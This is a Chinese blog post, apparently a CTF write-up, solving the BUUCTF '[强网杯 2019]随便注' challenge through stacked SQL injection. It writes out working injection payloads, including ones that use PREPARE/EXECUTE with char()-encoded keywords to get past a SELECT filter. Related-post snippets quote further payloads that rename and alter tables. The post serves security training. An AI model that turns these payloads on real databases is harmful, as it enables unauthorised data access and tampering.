【BUUCTF】[强网杯 2019]随便注1

已于 2022-03-14 20:17:31 修改
阅读量387 收藏
点赞数 1
分类专栏: sql注入 文章标签: SQL注入 预处理语句 堆叠注入 MySQL 安全防护
于 2022-03-07 20:17:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aoao331198/article/details/122972375
版权

题目很明显是一道SQL注入题目

1'

 1' #

正常回显

尝试select

过滤很多关键字

尝试堆叠注入

1';show databases;

 1';show tables;

坑点:mysql中点引号( ' )和反勾号( ` )的区别

linux下不区分,windows下区分
区别:
单引号( ' )或双引号主要用于字符串的引用符号
eg:mysql> SELECT 'hello', "hello" ;

反勾号( ` )主要用于数据库、表、索引、列和别名用的引用符是[Esc下面的键]
eg:`mysql>SELECT * FROM   `table`   WHERE `from` = 'abc' ;

 这里学习一种堆叠注入比较常见的攻击方式,预处理语句

 第一种方式

PREPARE name from '[my sql sequece]';   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name;  //删除预定义SQL语句

1';PREPARE command from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE command;#

char()根据ASCII表返回给定整数值的字符值
eg:
mysql> SELECT CHAR(77,121,83,81,'76');
-> 'MySQL'

contact()函数用于将多个字符串连接成一个字符串
contact (str1,str2,…) 
eg:
mysql> SELECT CONCAT('My', 'S', 'QL');
-> 'MySQL'

第二种方式

SET @tn = 'hahaha';  //存储表名
SET @sql = concat('select * from ', @tn);  //存储SQL语句
PREPARE name from @sql;   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE sqla;  //删除预定义SQL语句

1';SET @sql=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE command from @sql;EXECUTE command;#

aoao今晚吃什么
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF[强网杯2019]随便
楼阁de猫的博客
09-23 512
[强网杯2019]随便 知识点:堆叠入 首先先输入一个1’,发现报错,再输入1’#,有回显,再输入1’ order by 2#,1’order by 3#,当输入3的时候发现无回显,说明入点是2,但是当我们输入1’ union select 1,2#时,发现过滤了很多关键字,这时我们就要考虑堆叠入 我们输入1’; 发现下面出现了一条横线 那应该是堆叠入了,(什么是堆叠入呢:在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两
BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
buuctf web题解之[强网杯 2019]随便1详解(1)
m0_60666841的博客
04-07 402
讲解视频,并且后续会持续更新**
BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 4051
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
BUUCTF-WEB:[强网杯 2019]随便 1
_Co1a
01-24 975
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
buuctf [强网杯 2019]随便 1
热门推荐
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
BUUCTF强网杯 2019随便1 write up
GZWZ_的博客
04-06 4845
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
buuctf[强网杯 2019]随便 1(超详细,三种解法)
最新发布
2401_84968940的博客
05-12 293
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
BUUCTF-[强网杯 2019]随便1
Monica的博客
09-06 644
目录 题目: 方法: 其他问题: 1、url中#是特殊字符,参数中有#号的时候需要进行url编码。 2、url中空格变成+和空格变成%20问题 题目: 方法: 只有输入1和2才有结果 发现输出是两列,一列是键,一列是值 测试是什么闭合 输入1'发现有个报错 我们复制near后面的代码,通过一个字符一个字符的删除,发现是: 单引号 单引号 1 单引号 单引号 单引号 所以这不是双引号闭合,而是一个单引号闭合。 测试输出有几列 pa...
[强网杯 2019]随便 1
weixin_45674567的博客
05-23 613
步骤 找到flag列后: 输入1’;RENAME TABLE words TO words2;RENAME TABLE 1919810931114514 TO words;ALTER TABLE words CHANGE flag id VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;# 再输入1’ or ‘1’='1查询,得到flag, 这个参考博文很详细,认真看,不懂就搜,本人只能跟着老师走。 ...
BUUCTF——[强网杯 2019]随便 1
小白一枚多多关注的博客
03-17 382
这道题是强网杯的题,如果各位之前做过攻防世界有可能就知道强网杯代表着什么,代表着题很难,鹅鹅鹅,好了我们开始进入环境 进入环境后只看见了一段文字和一个文本框以及提交按钮,当然在这里我们还不能猜测出是用什么方式进行攻击,老规矩查看一下源代码看看有没有什么有价值的信息 可以看见源代码中说了一句sqlmap是没有灵魂的,那么就此可以判断出这道题应该是sql入并且sqlmap是做不出来的,所以必须得是手工入,那么手工入就需要判断入点在哪里,接下来就是图文解释了,太长了难的打字了 因为禁用了s
BUUCTF [强网杯 2019]随便1(另一种方法)
weixin_53955759的博客
06-21 376
打开环境,先判断一下是单引号还是双引号闭合
BUUCTF_[强网杯 2019]随便
qq_45628145的博客
04-25 592
BUUCTF_[强网杯 2019]随便 进入题目环境 进去之后输入框就有一个1,提交。 这里可以看到查询出了1和hahahah。 判断有没有入点 输入1’,报错了。 输入1’ and 1=1 #,查询结果和1一样。 输入1’ and 1=2 #,无回显,因此,判断这里存在入点。 输入1’ or 1=1#,得到了这个表里面的所有内容。 开始入 可以看到上面查询结果有1和hahah...
buuctf 2019强网杯 随便
devilare的博客
09-26 341
2019强网杯 随便 来到页面发现只是一个提交栏 随意试一下输入1’有回显说明存在sql入,输入万能密码试试1’ or 1=1;#输入1’; union select;#看看能否联合查询一下存在过滤,且没办法通过大小写绕过,好难,看看wp。看来需要堆叠入(ps:堆叠入就是一次性执行多条查询语句) 输入1’;show databases;#查看所有的数据库;en。。。没有和flag有关的字样,再输入1’;show tables;#看看表 ...
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值